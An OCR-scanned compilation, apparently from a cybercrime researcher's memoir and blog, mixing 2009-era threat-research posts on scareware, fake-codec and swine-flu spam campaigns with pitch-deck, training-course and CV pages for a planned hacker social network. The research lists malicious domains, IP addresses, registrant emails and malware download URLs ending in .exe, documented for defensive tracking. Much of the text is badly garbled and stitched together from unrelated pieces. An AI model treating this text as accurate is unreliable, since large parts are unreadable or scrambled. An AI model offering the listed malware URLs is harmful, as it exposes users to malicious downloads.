Spy and Adware Protection cetects 


ot How VirwsRemover 2009 can help you? 


Verusiemover 2009 is Gesqgned bo provide you wath the Maghest 
level of protection against maboous spyware and malware including 
keyloggers, hoachers and Gownboaders. 


Sovewe Were < 
Spyware.CredtCarder.y 


Vevstemover 2009 technology Drotects you from both known and 
emerpng threst v janants and gives you real-brne protection eer 
your Comper with ow advanced XP antrewus Guard real-b Adware Chcher Pe 
mond 

or. : y, 


Soveere Zod.d 


Confegerabie Seyware Scanner f 


ir free from trojars, spyware, adware, worms, 
on oyteapert %. (OOthRS, Galers and other makoous prograrnds 


2 Why spywere is dangerous? 


Contrets your PC Moniters your F 
og files and grves the neces 


Spyware is the most prevalent threat to online computer privacy 
and poawrey fr eae tin 
spam and as hudden addibons to legdmate programs 


Stews privac 'y weelation sso detects 
a hee pthp tee ees Spyware beings lots of damage nt the sense of data coniderbalty 
mete ‘Ogres reguter every user step, both msde the system 

in the Internet. All informabon a delivered to the malefactor 


“Ny cofexts data n hes, NOt your, merest 


The most recent list of of domains on popular DNS services is as follows. Sub-domains 
within are excluded since there are several hundred currently active per domain: 
Okfzzl .us - 95.168.172.202 - Email: diannefostergcei@yahoo.com 

52ubih .us - 95.168.172.198 - Email: joeminoryhjo@yahoo.com 

5nw8b3 .us - 95.168.172.193 - Email: carolynfosteruwwi@yahoo.com 

60mptk .us - 95.168.172.192 - Email: bernadettehockadayfedt@yahoo.com 
6ry4nv .us - 95.168.172.191 - Email: markpackvesa@yahoo.com 

77m8uh .us - 95.168.172.190 - Email: miguelbellhyes@yahoo.com 

axnwpy .-us - 95.168.172.204 - Email: hungsandfordoehx@yahoo.com 

bumgli .us - Email: coobybrown3@gmail.com 

cqxuhk .us - 95.168.172.203 - Email: michaelkoontzutae@yahoo.com 

dfkghdf .us - 212.95.58.49 - Email: umora@live.com 

dfwdowrly .us - Email: orest@hotmail.ru 

edtbcm .us - 95.168.172.198 - Email: warrenskinnerumpi@yahoo.com 

edu4life .us - Email - joh.n.ebrilo@gmail.com 


fc4oih .us - 95.168.172.187 - Email: florencemclaughlinovpp@yahoo.com 
fcbcwo .us - 89.149.216.146 - Email: dorisnaupkou@yahoo.com 

fpq58z .us - 95.168.172.205 - Email: thomassoileautysz@yahoo.com 
fzjt82 .us - 95.168.172.188 - maryevansarpl@yahoo.com 
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Cyber 


Intelligence 


The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 
The RBN, The Koobface Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns Including Botnet 
and Money Mule Recruitment Scams Traced Down to Their 


Source Including Various Underground Market Propositions 
Exposed 


https://ddanchev.blogspot.com 


Dancho Danchev 
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» for hackers 


develop ave 


already expressed interest in working on the 


ct and we have several other VR 


Proj 


application developers walting to join the team 


- The primary laur oint for the project will 


be the official Web site of Astalavista.box.sk 


including a massive early-bird advertising 


campaign the competing / 


daomain 


eting and advertising will 


} } 
y-leading partnerships 


be done using indust 


with leading hacker and security expert Web 


sites al community and securi y 


uding active social 


ir 
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id outreac 


To-Do List 


Reach out to Custom Crypto-currency 
Developer to properly launch and introduce 
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fecal Mujahid Magazine 
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T B | ££ o ic) 

- End-to-end Encrypted Communications 
including Enhanced Personal Encryption and 
User Identification using PGP (Pretty Good 
Privacy) and Jabber OTR (Off-The-Record- 
Messaging) including Yubico-Based Two- 
Factor Authentication Extended Validation 
SSL and DNSSEC Support 


- Closed-Communication Group Network 
Preserving Key Privacy and Security Features 
f Modern Hacker and Security Expert Social 
Pee Platform 


- P2P-Based Content Distribution and Hosting 
Including Censorship and Surveillance 
Resilience 


- Standardized Security Product and Security 
and Hacking Service Partner API Allowing 
Vendors and Commercial and Community- 
driven Hacking and Security Service 
Providers Easy Access to the Platform 


of if off 
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Project Status: 


Disruptive Individuals is a legally registered 


dG in Bulgaria run managed and 
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Marketing Concept 


The platform ultimately targets users in the 
following Categories: 


Hackers 


Independer Security Researchers 


Penetration * 
Hacker Groups 


Activists 


ship Resear 
Exploit Writers 


Malicious Softw 


Hacktivists 
Political Activists 
Security Bloggers 


Cybercrime R 


Malware Researchers 
OSINT Analysts 


Intelligence Analysts 


Sample Personal Photo of CEO and Founder 
of this Project - Dancho Danchev - The 
World's Leading Expert in the Field of 
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© Trreatirtemgence enatier 
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© Moneypet Serace 


~ Hite > Subttasts 
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masoous actty 


© House Threatintetgence 
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© Words largest snapshet of 
mabocus actuty 


+ New Sudtast 


CO Wcisent Response Senice 


> Show 2 Settaste 
© Peestation Testing 
> Grow 3 Suttasts 
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Third Stage - Services Fourth Stage - Talent 
© Seeiat Meda Community © Talent Acquisition Program 
Dow 1! Suttasts Ace 6 attests 
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Recommended Organizations 
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Initial Stage - 01 Seventh Stage - Brand... Tenth Stage - Website 


< Investor Outreach - Iris oo © Merchandise ©) Top Directory Links 
Capital - Presentation 
~ Hide 3 Subtasks 


© Wikipedia 
© Investor Phone Project oo © Opt-in 
Discussion 
© Logo Design O Traffic Exchange 
O Investor in-Depth Project O Exclusive Hacking and 
Introduction - Flow © Creative Design Security Links 
© Investor - In-depth Video © Wallpaper Contest vein 
Presentation 
©) Featured Security Products 
+ ©) Social Media 
v Hide 7 Subtasks 
ee © Security Router 
© Twitter 
© Privacy Router 
© Facebook 
© Security Mobile 
© Google+ 
© Secure PC 
© Instagram 
© Secure Desktop 
© Unkedin 
© Security Keyboard 
© Angelist 
© Secure USB Storage 
© YouTube 
+ New Sublask 
+ New Subtask 


ra © Featured Security Senices 


> Show.6 Subtasks 
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gfor8g .us - Email: christopherdockinsptdg@yahoo.com 

gotpig .us - Email: BeatriceJBrown@text2re.com 

hhjsuuy .us - 217.20.117.198 - Email: jarovv@gmail.com 

hk2april .us - 78.159.122.123 - Email: zainez@gmail.com 

hk3april .us - 78.159.122.137 - Email: zainez@gmail.com 

hno6sh .us - 89.149.238.12 - Email: alfredmeadenzcy@yahoo.com 
i2u6nr .us - 95.168.172.202 - Email: jameshendricksxuwg@yahoo.com 
ik3trends .us - 88.214.198.14 - Email: akililewis@gmail.com 

itn92j .us - Email: nicholasmanoicdmg@yahoo.com 

j4vre4 .us - bettyfavorsiqzv@yahoo.com 

kzq2i2 .us - 89.149.229.157 - Email: robertmitchellrswv@yahoo.com 


I5ykp6 .us - 95.168.172.195 - Email: chrishuntpjzc@yahoo.com 
Ih85uk .us - 95.168.172.200 - Email: susannelsonggyp@yahoo.com 
Ip24april .us - 89.149.228.129 - Email: ramerod@gmail.com 
m9nvzp .us - 89.149.216.50 - Email: jenniferduncanakcq@yahoo.com 
mm0O0Oapril .us - 212.95.55.115 - Email: brevno3@gmail.com 
mm9Qapril .us - 78.159.122.91 - Email: brevno3@gmail.com 
n5y3m8 .us - 89.149.243.86 - Email: imogenegreenrqqr@yahoo.com 
na8nw2 .us - 89.149.216.146 - Email: jeremyfitchcupl|@yahoo.com 
oag3h8 .us - 95.168.172.200 - Email: susanspidelesig@yahoo.com 
polapril .us - 212.95.55.138 - Email: preadzz@gmail.com 

po3april .us - 78.159.122.93 - Email: preadzz@gmail.com 

pp6sqo .us - 95.168.172.197 - Email: connierobertsolni@yahoo.com 
pro061r .us - 89.149.216.146 - Email: shirleywardauof@yahoo.com 
qdhccy .us - Email: shark@nightmail.ru 

qq338p .us - 89.149.221.36 - Email: debragonzalezyplu@yahoo.com 


repszp .us - 89.149.221.36 - Email: christinamerrillzznd@yahoo.com 
rrgtnm .us - 95.168.172.203 - Email: josephelliskozc@yahoo.com 
rt658y .us - 89.149.207.33 - Email: luannamcgeeiqwb@yahoo.com 
rzi6rj .us - 95.168.172.189 - Email: leatriceporterlhbz@yahoo.com 
scsrn8 .us - 95.168.172.201 - Email: donnabrownpgpa@yahoo.com 
t9xu44 .us - 95.168.172.194 - Email: robertbissettezeub@yahoo.com 
trfddp .us - 89.149.243.89 - Email: davidwilliamsqljt@yahoo.com 
up3xv7 .us - Email: dennismontantecoco@yahoo.com 

vecy5r .us - Email: merlynsmithsqxm@yahoo.com 

vlj5jn .us - 95.168.172.196 - Email: angelostewartqfoq@yahoo.com 
vr31qo .us - 95.168.172.199 - Email: christinearcherzhgz@yahoo.com 
wk7iie .us - 95.168.172.204 - Email: jewellnakashimalgny@yahoo.com 
x2ar3e .us - Email: bobbielopezeits@yahoo.com 

xe24py .us - 89.149.243.138 - Email: johnbarberprfi@yahoo.com 
xecuk8 .us - 95.168.172.194 - Email: lutheralfaronloz@yahoo.com 
yl8ais .us - 89.149.216.147 - Email: meredithflackflup@yahoo.com 
yqfvp4 .us - 78.159.96.84 - Email: julierussellnnro@yahoo.com 
zvlewrms .us - Email: ygovoruhin@list.ru 

zxel1ld .us - 95.168.172.195 - Email: christopherlewisxghb@yahoo.com 
zy7itf .us - 89.149.207.244 - Email: cindyruizixqr@yahoo.com 
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13news.hobby-site .com 
17news.endofinternet .net 
18news.homeftp .org 
19news.blogdns .com 
19news.dnsdojo .org 
19news.gotdns .com 
19news.kicks-ass .org 
19news.servebbs .com 
22news.blogdns .com 
creditratingguide. hobby-site.com 
disneyearrings .hobby-site.com 
flatbellydiet .hobby-site.com 
hydrangacutflowers .hobby-site.com 
isa-geek .org 

mxzsaw .hobby-site.com 
mysteryterms .hobby-site.com 


The rotated scareware/fake security software domains include: scan-antispyware-4pc 
.com - parked at 195.88.81.93 the same [3]portfolio of fake security software domains which 
| warned that by blocking you would proactively protect your customers from black hat SEO 
campaigns - like this one for instance 

pcvistaxpcodec .com 

onlinevirus-scannerv2 .com 

av-antispyware .com 

scan-antispy-4pc .com 

fastviruscleaner .com 

securityhelpcenter .com 

scan-antispy-4pc .com 

scanner-work-av .com 

scanner-antispy-av-files .com 

adwarealert .com 

proantispyware .com 
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Sixth Stage - Marketing Ninth Stage - Security 

) Viral Marketing Campange Wed Ste Malware Montonng 
) Securty Outreach Honeypot Serace 
) Lak Exchange incxdert Response Sernce 
) Hactang Outreach Penetration Testing 

) Comnernstuty Outreach 

2D Parnes Request 
) Sponsorsne Request 


Third Stage - Services Fourth Stage - Talent 
pisses Talent Acqusmios Program 
Forum Comnerumty ee 
Free Access 


Woods Largest Hacting 
and Secunty Foewn Board 


Collaborative Book Wenn 
Servce 
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Fifth Stage - R&D 


Secunty Incubator 
Secunty levester Fusd 
Acqastion Spotters 


OC Secunty Researcher 


Astalavista Security Group Security Training - 
Basics of Cybercrime 


Explore the Basics of Cybercrime Research 


Highlights 


v Bancs of Cybercrime Research 

v in-Depth Diccuscion on The Most Prolific Cybercnme 
Groups and Gangs 

v In-Depth Discussion on Public Cybercrime Research 
Toots 

Vv In-Depth Dizeuszon on Propnetary Cyberenme Reseach 
Toots 

V in-Depth Discussion on the Future of Cybercrime 
Fighting 


by Dancho Dancheyv 


COURSE DETAILS 


Change photo 


Astalavista Secunty Group 2.0 - The Worlds Most Popular information Security Portal is 
Proud to present the general avadlabaty of 8 new Course matenal entitled - The Baacs of 
Cybercrime’ offering in-depth understanding of basic Cybercrime research topics targeting 
@ variety of audience targeing novice and expenenced security researchers empowering 
them with the necessary data information and knowledge to stay ahead of current and 


emergng threats 


22017 


Disruptive Ind... 


qu 


World's Largest Virtual Reality Based 
Hacker and Security Expert Social 
Network 


Questions? 


launch@wefunder.com 


Legal Primer 


Founder FAG 


22018 


~ 


Reach out to Custom Cry 


o-currency 


Developer to properly launch and introduce 


SecureCoin 


Inclusion Including Banner Advertisement 


Working on the 


and Innovative C 


Working on the Project FAQ 


Working on the \ tform 


Tutorial 


Reach out to CD/DVD Labeling and Shipping 


Service Provider 
Record Ts 


»-Hour Long Introduction to the 


Platform 


functionality 


Develop a proper n Platform 


Financials 


Virtual Reality 


$10, 


Application 
Development 


Major Web Property A 


quisition and 


Partnership to Acquire More Us 
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Dancho Danchev Presents! Brace Yourselves! 


ee, 


Grab today a free copy of the Second Free. 
"Exposing Iran's Hacking Scene OSINT-E Bd 


and 
Technical Collection Empowered and Visualized Report? 
Priced at $500 for an Unlimited Distribution Among Your 
Organization including Individual Researcher Use - This 1s 
the Most Comprehensive and Technicall Sophisticated 
Analysis of Iran's Hacking Scene Up-to-Date! 


>: Lhe 
ce 


Commercial Copy Available! A proach me toda) 
pprnach yo r mana 4 008 mpower_your [Threat 
intelligence Team! An USINT Conducted Today is a 
Tax Payer's Dollar Saved Tomorrow! 
https://ddanchev.blogspot.com 


Official OSINT Report Price - $500 


Technical Collection Data - Exclusive Email: dancho.danchev@hush.com 


Copy Available! 
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Flatiorm and Social Network Migration 


Import 


Import G 


Import Steam Contac 


Invite Your Friends 


n Points for Converted Friends 
Claim VIP $ 
T 
Major Security Proj 
Major Hacking Proj 


Old-School t 


atus 


High-Trafficked 


Old-School Se 


Old-School 


Old-School Security Software Developer 


ess and Permiss 


Control System 


Geolocation Points 
VIP Status 


Content-Based “Points E 


Voting-Based 


Comments-Based 


tion-Specification 


Applic 


tion 


le Basic Introdu 


Requirements 
Valid Email 
Valid Phone Number 


Valid Second Phone Number 


Valid anc 


dF 


er-G 


Valid and User-Generated 


sed Incl n 
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Click to see more video 


Download locations/related fake codec redirections: 
winpcdown10 .com (194.165.4.77) 

suckitnowl .com 

winpcdown99 .com 

loyaldown99 .com 

codecxpvista .com 

wincodecupdate .com 

velzevuladmin .com 

tubeloyaln .com 

wedare.tubeloyaln .com 

lamer.tubeloyaln .com 
billingpayment.netcodecs.tubeloyaln .com 
videosz.tubeloyaln .com 

loyal-porno .com - the same domain was recently exposed in [4]the same blackhat SEO 
campaign 

win-pc-defender .com 

codecvistaz .com 

loyalvideoz .com 


Sample detection rates: 
litetubevideoz .net/codec/277.exe - [5]detection rate 
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Official Press Release: 


In 2020, we're proudly presenting the World's 


icated 


first and most popular and soph 
Virtual Reality and Augmented Reality 
Network Platform or Hackers and Security 
Experts connecting millions of users globally 
through the launch of an ubiquitous VR-based 
Social Media platform and the general 
availability of an ubiquitous XMPP-based VR 
based Virtual Keyboard and a sophisticated 
skills and experience including location-based 
and aware Virtual Reality experience 
successfully connecting millions of users 


y ona Virtual Reality based lands 


ape 
empowering everyone with the necessary "know- 
how’ and technical expertise to reach out to 
fellow colleagues VIP members from the Hacker 
Community including the Security Industry 


including the general availability of an 


ubiquitous cro. platform based Desktop and 
Mobile Device application issuing “real-time” 


notifications and updates possibly as 


sting in 

, , ; ; 1 
the actual improvement of the user's work-flow 
in both the "real" and Virtual Reality World 
ineluding actual project and business including 
personal and skills and experience based 


*match-making” and Hacker and Securi 


Community outreach 
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Webroot Inc. 


DANCHO DANCHEV’S 
SECURITY RESEARCH 
FOR WEBROOT INC. 


In-Depth Overview and Analysis 
of Security Blogger Dancho 
Danchev's Security Research for 
Webroot Inc. Circa 2012-2014 
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Dancho Danchev 
Ryoe 
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Summary 


Darcro Oarchey a the wands Mnading eae 9 the fend of CyDerLTIne IGreng and Pens etagnrce games 
Nace) Rvety puree Met Can Me Ryy Ls poLeneny Freel Hataenie Babin bs ence vot UF 
SDE MP Quality BAMA Et ETD BNE ORIN Pe POAIY Maden Prest rimtgerce tog 
TOAe Lowe Chey, arin Craretnen’s Meat Smams of telerematn Tannery Knmatinoe areh Winireit's Threat 
tao we Fen ewtnar teamed Necro SONNE CON PCWent SCAagaune Metiegpete MY Temes 
OT Compterieerd “eUegarre curenty prukary Pree restzere 6 te rebar) Being tree 
tempore tag ace Dechert Mind Seeame of Mtormaton Securty \nom@ag WMS Sea nected et 
54M page vows since December, 20 
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ran Leet 
Comevaer Naearty 
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Experience 


Bp Project Operator 
Astatgesta boa wa 
dan 220: Promeen (3 yaar 2 manene + 
fron neta tee ae 


© Tareat intetegence Anatyst 
GramSerse 
Bee 2029. Feb 200! OF wert 
Treat rietageree Anya Aap opagnemne a 


@ Securty Blogger 
Areedto Prone 
Now DOTe Owe 2019 2 eroree: 
Secwrty Sogye ot Aemesite Frere Nips Powe aematitegire sum 


ee 
Tenacutone 7! 
an 2008 «dn 7070 1 meee 
OBNT Anaiyet at Preatntore?! tps Mews reschrere? | com 


@ Securty Comautant 
KCS GROUP EUROPE LIMITED 


Agr 2018 - Ad 208 4 wore 
Set Coren tart 10pm ewe Mme com 
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sample web traftic statistics ror tne 
Official Partner and Actual Founder and 
CEO of this Project - Dancho Danchev’'s 
Blog - Mind Streams of Information Security 
Knowledge: 


Oarche Danchevs hog: Mint Surams of wiformatan Lecuity Knowledge 


Sample Web Traffic Statistics for the 
Official Partner and Actual Founder and 
CEO of this Project - Dancho Danchev's 
Blog - Mind Streams of Information Security 
Knowledge: 


Feed Stats Dashboard Ce aL ee | 


Wednerday, December 14, 2005 - Saturday, September 14, 2019 


* 2,888 subscnibers (on average) 
° 157 feach (on average) B 


See more about your subscnmers » 
Populat Feed News 


nae vers CUKS 
Total 155726 6271221 
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Sallipie rersviial FNew VI LEY ane rounuer 
of this Project - Dancho Danchev - The 
World's Leading Expert in the Field of 
Cybercrime Research and Threat 
Intelligence Gathering: 


HNNCast052110 


Sample Web Traffic Statistics for the 
Official Partner and Actual Founder and 
CEO of this Project - Dancho Danchev's 
Blog - Mind Streams of Information Security 
Knowledge: 


Oercter Daretev's Shing Mant Lures of Hlurmatann Lerueity Menetedge 


[1180] 


22029 


Astalavista Security Group Security Training - 
Basics of Cyberwarfare 


Explore of the Basics of Cyberware 


by Dancho Danchev 


COURSE DETAILS 
Astalavista Securty Group 2.0 - The Worlds Most Popular Information Security Portal is 
Highlig hts proud to present the general availability of a new course matenal entitled - The Basics of 
Cyderware offering an in-depth overview of the World of Cyberwarfare including in-depth 
wv Whatis Cyberwarfare? discussion of various technologies service provaders offensive and defenstive cyberwarfare 
v In-depth Discussion on the Basics of Cyberwarfare methodologies including in-depth discussion on various nation-state actors further offering 


an in-depth overmew of current and emerging trends including an in-depth discussion on 
the future of cyberware 


wv Overall overview of The Top Cyberwarfare Service 
Providers 

Vv In-depth Discussion on Nation-State Actors 

wv Overview of Current and Emerging Cyberwarfare 


Services and Technologies 
Seventh Stage - Brand... Tenth Stage - Website Second Stage - Products Eith Stage - Hacking Sixth Stage - Marketing Ninth Stage - Securty 
Mercharaie Top Owectory Links ud Secunty Router Hactung Maganne * View! Marketing Campage Web Ste Mateare Montora 
=) Dattonas = Tateantn “ ean - 
One vere 
Feared Srcwty Prodvcts Prvacy Rewer ‘Secwey Ovtreach Honeypot Senace 
Loge Design Marccover Megane 
antes Mars 
Creates Degen 
Festures Securty Servces Secure Phone Link Exchange incxdent Response Serace 
‘Watpaper Content 
Wargames c® 
coe Securty Owectory , Secure PC a oscar q Mactong Ovtroach Penstimes Testeny 
~ wee Comenerum Access 
teeter 
Fecebect Securty News Secure Desktop 
Hac hang E rad 
: Top Parther Link Exchange 
ratayen 
Se wty Keyteaet Commnerast Access: 
Lenssen, shies 
arent Features image 
Wutuse Secure USE Storage TC eee 
Festures Webnte 
Pestures Seouty toot + Bg Dowey 
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winpcdown99 .com/pcdef.exe - [6]detection rate 

winpcdown9Q9 .com/file.exe - [7]detection rate 

setup.adwarealert .com/setupxv.exe - [8]detection rate 
files.scanner-antispy-av-files .com/exe/setup 200093 1 1.exe - [9]detection rate 


Monitoring of the campaign would continue. 


Related posts: 

[10]Dissecting the Bogus LinkedIn Profiles Malware Campaign 
[11]Bogus LinkedIn Profiles Redirect to Malware and Rogue Security Software 
[12]Blackhat SEO Redirects to Malware and Rogue Software 

[13]The Invisible Blackhat SEO Campaign 

[14]Attack of the SEO Bots on the .EDU Domain 

[15]pOrn.gov - The Ongoing Blackhat SEO Operation 

[16]The Continuing .Gov Blackat SEO Campaign 

[17]The Continuing .Gov Blackhat SEO Campaign - Part Two 
[18]Rogue RBN Software Pushed Through Blackhat SEO 

[19]Massive Blackhat SEO Targeting Blogspot 

[20]Blackhat SEO Campaign at The Millennium Challenge Corporation 


http: //ddanchev. blogspot .com/2009/04/diverse-portfolio-of-fake-security_16.htm 


ttp://ddanchev. blogspot .com/2009/04/twitter-worm-mikeyy-keywords-hijacked.htm 


ttp://ddanchev. blogspot .com/2009/04/diverse-portfolio-of-fake-security_16.htm 


| http://wmv. f-secure con/woblog/archives/00001656. heal 
_hetp:/ /wuy. virustotal. con/analisis/5TeA78ca7adGebc74adb30d50003e5ba 
_http://wny. virustoval  con/analisis/e8c36c1b60095031602728e67 004252 
_netp://wav. virustotal.con/analiais/S9{)26d54606a4282¢caAcb717€6c50 
_http://wny. virustoval  con/analisis/057976icB88ede033556782c65db30e72 
_notp:/ way. virustotal .con/analiss/00591051841247090998<08964020d1 


. http: //ddanchev. blogspot .com/2009/01/dissecting-bogus-linkedin-profiles.htm 
. http: //ddanchev.blogspot .com/2009/04/bogus- 1linkedin-profiles-redirect-to.htm 


. http: //ddanchev.blogspot .com/2008/06/blackhat-seo-redirects-to-malware-and.htm 
. http: //ddanchev.blogspot .com/2008/01/invisible-blackhat-seo-campaign.htm 
. http: //ddanchev. blogspot .com/2007/01/attack- of-seo-bots-on-edu-domain. htm 
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http: //ddanchev.blogspot.com/2007/11/p0rngov-ongoing-blackhat- seo-operation.htm 


http: //ddanchev.blogspot.com/2008/02/continuing- gov-blackat-seo-campaign.htm 


HR 
NO 


. http: //ddanchev. blogspot. com/2008/02/continuing-gov-blackat-seo-campaign_25.htm 


http: //ddanchev.blogspot.com/2008/03/rogue-rbn-software-pushed-through.htm 


. http: //ddanchev.blogspot .com/2008/02/massive-blackhat- seo-targeting-blogspot .htm 


a 
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http: //ddanchev. blogspot .com/2008/05/blackhat-seo-campaign-at-millennium. htm 
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Connectivity Requirements 


> Malware Connector 


tion Hosting a 


Dissemination 


Central Sern 


suncdancy Fi 


Two-Factor Authenti 


SSL Encryption 
Yubic 6) Twe ) Factor 
PGP Key Encr} 


Convert Current lt 


Introduce New Users 


Jabber-Ba 


CLA 


i Closed 


VPN Router 


SAVE & CONTINUE > 


(119) 


[1192] 
22040 


© Lego Design 


© Social Meda 
~ Hide 7 Subtasts 
O Tater 
© Facebook 
© Geopier 
© lettagram 
© Untean 
O eget 
© YouTede 
+ New Subtast 


re 


© Book Waning Serco 
© Meda Producten 


+ Mew Subtast 


© Secerty Directory 
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Financials 


$10,400 - Virtual Reality Application 
Development 

$25,500 - Major Web Property Acquisition and 
Partnership to Acquire More Users and Spread 
the Word 

$10,000 - Logistics Infrastructure for Shipping 
the CD/DVD Containing the Application 
$3,000 - Printed E-book FAQ and Virtual Reality 
Application Manual Production 

$20,000 « Infrastructure Management and 
Closed-Ne work Group Development 


$15,000 - Custom “Points Based” and 


vy 
y 


Democ including Liquid-Bas 


Cryptocurrency Development 
$3,000 - Personal Printed Memoir Design and 


Development 


500 - Advertising and Marketing Including 
VR Application Promotion and Traffic 
Acquisition 

$15,000 - Hacker and Security Community 
Outreach in terms of API Implementation 
including a Standardized and Custom Service 
and Solution Platform Integration 
Implementation 


$30,000 - Acquire an Industry Leading VIP 


Team of Hackers Innovators and Application 


Developers and Pay Maintenance Fees for the 


VR Application 
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Home Bestsellers All products FAQ Contact us & crt 040 news) EES 
Proceed to Checkout si sam 
\ ewe tenes 
Special Offer 


Canadian ) Pharmacy y Free Viegra samples 


21 Internet Online Drugstore | 4 pillts for every order 


12 pits for order $300 


0 mg 
ORDER NOW 


© Blood Pressure'Cholestero! Our price 
sr Ow ree Ow pree 
$282 $s 


© Body Butang 


© Dertal Whaterang 
enw Atel bo cae Mere nt sd te cat Yore nto ale be Cat 


© Female Enhancemert 


© Genera Heath Levitra Viagra Soft Tams 
Ow pree Ow pree Ow pree 
© Gums New! $2.35 $1.64 $144 


© Heaty Bones 


© Mypnctheragy tok @ www Ure ot @ www Vor nt @ ww 


© Mens Hea 


© Pain Revet PY etes toons! 
Ow pree Ow pree 
© Patches New $0.45 $045 Oe oree 


© Pes 


The people behind the ongoing [1]swine flu spam campaign have either missed their marketing 
lectures, haven’t been to any at all, or are simply too lazy - their processing order is not even 
using SSL - to fully exploit the marketing window opened by the viral oubreak - the majority 
of [2]spamvertised domains are redirecting to your typical Canadian Pharmacy scam, instead 
of [3]swine flu related templates. 


Swine flu spamvertised domains: 

lijgihab.cn; jinkohab.cn; litgukab.cn; namyalab.cn; waytipab.cn; ritlarab.cn; bersoxab.cn; xaqk- 
abeb.cn; jamnibeb.cn; pahdeheb.cn; qeqyukeb.cn; giwgqoreb.cn; zajbaveb.cn; zacniyeb.cn; 
baqnubib.cn; zephecib.cn; texlocib.cn; fedpijib.cn;meysujib.cn; goltujib.cn; mukwujib.cn; 
buljakib.cn; cutcurib.cn; bejdasib.cn; xikgosib.cn; bacnaxib.cn; kuskuzib.cn; juvyidob.cn; 
sowgugob.cn; buhbulob.cn; tonjotob.cn; kozgewob.cn; gasfexob.cn; pocdiyob.cn; kujroyob.cn; 
mirlacub.cn; kixqucub.cn; rovjudub.cn; jokrogub.cn; tusyajub.cn; gixxukub.cn; mospomub.cn; 
hixmipub.cn; zismerub.cn; cegfasub.cn; dimfevub.cn; qebhuvub.cn; duvlixub.cn; tiqceyub.cn; 
cogwibac.cn; minkucac.cn; dadwafac.cn; dilpogac.cn; jovsogac.cn; juwcolac.cn; wefmunac.cn; 
cexfopac.cn; wejpopac.cn; dovniqac.cn; mulsatac.cn; labwewac.cn; lirquwac.cn; latzoyac.cn; 
tuwbazac.cn; motjudec.cn; jicmefec.cn; qujqugec.cn; fajnahec.cn; wobfojec.cn; saybilec.cn; 
Siyjogec.cn; gehgixec.cn; gajdezec.cn; sgytubic.cn; cabfecic.cn; nedsicic.cn; xorpilic.cn; 
bulxopic.cn; kisniric.cn; beszesic.cn; hiwdosic.cn; linrudoc.cn; rijnakoc.cn; mahhekoc.cn; hah- 
wikoc.cn; labniloc.cn; zocwoloc.cn; gommupoc.cn; yubbaqoc.cn; mefbugoc.cn; xeclaroc.cn; 
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of the VR application 


he primary purpose 


} 
to connect empower and facilitate an 


u 


eee , er 
biquitous real” World and Virtual World type 


isticated and novice Hacker and 


Security Expert experience ultimately 


of sop! 


connection international Hackers and Security 
Experts including the actual integration and 


development of never-seen and released-before 


API-based type of innovative services and 


produ rts ult y built on the fop of the V 


a Platform 


Built-in Ethical Penetration 


research and testi 


- Built-in API-based } one) 


(pot deployment 


i ~ } 
further assisting the Security Industry throt 


the eas oyment 


»r-seen before Clu of Activity 


Targeting Intelligence Analysts and Members 


of the U.S Intelligence Community through the 


' , } , , } 
general availability of an offensive and 


— = . , 
defensive Cyber Warfare Platform functionality 


ng the successful Training including the 

} ) tes ~ 
development of actual Wargames Scenario type 
¢ 


ree ee. a weet | 
of offensive and defensive Cyber Warfare 


Cluster-based activ 
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Sixth Stage - Marketing 
© Viral Marketing Campangn 
> Show Suttests 
© Security Outreach 


) Show 4 Setessks 


© Unk Exchaege 


» Show ) Gteasen 


© aching Outreach 

v Wiche 3 Satteankes 
© Comermnty Ouereach 
© Parnes Request 
O Spoecorsup Request 


+ thew Subtask 
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PEICLDe LUMI LU DUCA 


Contributor to HelpNetSecurity Managing 
Director of Astalavista Security Group's 
Astalavista.com - The Underground a Security 
Consultant for Frame4 Security Systems 
contributor to TechGenix's 
WindowSecurity.com security blogger for 
ZDNet Zero Day Threat Intelligence Analyst for 
Webroot leading to a successful set of hundreds 
of high-quality anaysis and research articles 
published at the industry's leading threat 
intelligence blog - ZDNet's Zero Day Dancho 
Danchev's Mind Streams of Information 
Security Knowledge and Webroot's Threat Blog 
with his research featured in Techmeme ZDNet 
CNN PCWorld SCMagazine TheRegister 
NYTimes CNET ComputerWorld H+Magazine 
currently producing threat intelligence at the 
industry's leading threat intelligence blog - 
Dancho Danchev's - Mind Streams of 


Information Security Knowledge. 


With his research featured at RSA Europe 
CyberCamp InfoSec GCHQ and Interpol the 
researcher continues to actively produce threat 
intelligence at the industry's leading threat 
intelligence blog - Dancho Danchev's - Mind 
Streams of Information Security Knowledge 
publishing a diverse set of hundreds of high- 


quality research analysis detailing the 


er nape: Vi - J..1 “ abate, oa aban 
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1-Based Social } 


Application-Sy 


Profile Basic 
Requirements 
Valid Email 


Valid Phone Number 


Category-B 


E 


Tags-B 


Distributed Search Engine Inde 


Voting-Based Access Permission Granting 


Featured VIP Particiy 


Network I 
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Education 
[Ey rogercncc! innotans | nhotand University of Appied Sciences 


Bachetr’s Geyee rterhatorna Bares ant Managerent Siudes 
2000. O08 


ZY Leyd Hogesimoot | Zuyd University of Apptied Schences 
Whernatone Bscets ant Manegerent Saudes 


2000 . 2089 


‘Skills 
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twecigabe Research + tcddertRenpone + Encrgten + Secsty 

Honors & Awards 

a Aetty H. Meal Award - ZDNet - Zero Oay's Bog - 2010 . Jenny 1 New Award 
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Cross-Platform Compatibility: 


<Q unity WeoxR [x] 
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I] us about you 


Dancho Danchev 


cEO 


My most successful 
accomplishment is the 
monitoring and taking down of 


the Koobface botnet 


in Mip://inkedin.com/in/dancho< 


w hittps,//twitter.com/dancho_da 


Founder 7 Full-Time v 
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Astalavista Security Group Security Training - 
Basics of OPSEC 


Explore the Basics of OPSEC 


wv Dancho Danchey 


COURSE DETAILS 
AStalavista Security Group - The World's Most Popular information Secuntty Portal is proud 
Highlights to present to general availabilty of a new course matenal enttied - ‘Basics of OPSEC 
empowenng novice and expenenced secunty researchers with the necessary data 
v Overview of OPSEC (Operational Security) information and knowledge to stay ahead of current and emerging threats 


v Basics of OPSEC 

Vv In-Depth Discussion on Public OPSEC Toois 

wv In-Depth Discussion on Proprietary OPSEC Tools 

v In-Depth Discussion on the Future of OPSEC 
Technologies 
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Start raising money in 15 minutes! 
Craft the pitch for Disruptive Individuals. 


10 second pitch 


World's Largest Virtual Reality Based 
Hacker and Security Expert Social Network. 


The best reasons someone might want to invest 


Led by CEO Dancho Danchev - the World's 
leading expert in cybercrime research 


. Official Project Partner Astalavista.box.sk - 
the original search engine for hackers circa 
1994 


5 Supported by thousands of international 
and U.S based hackers and security experts 
across the globe 


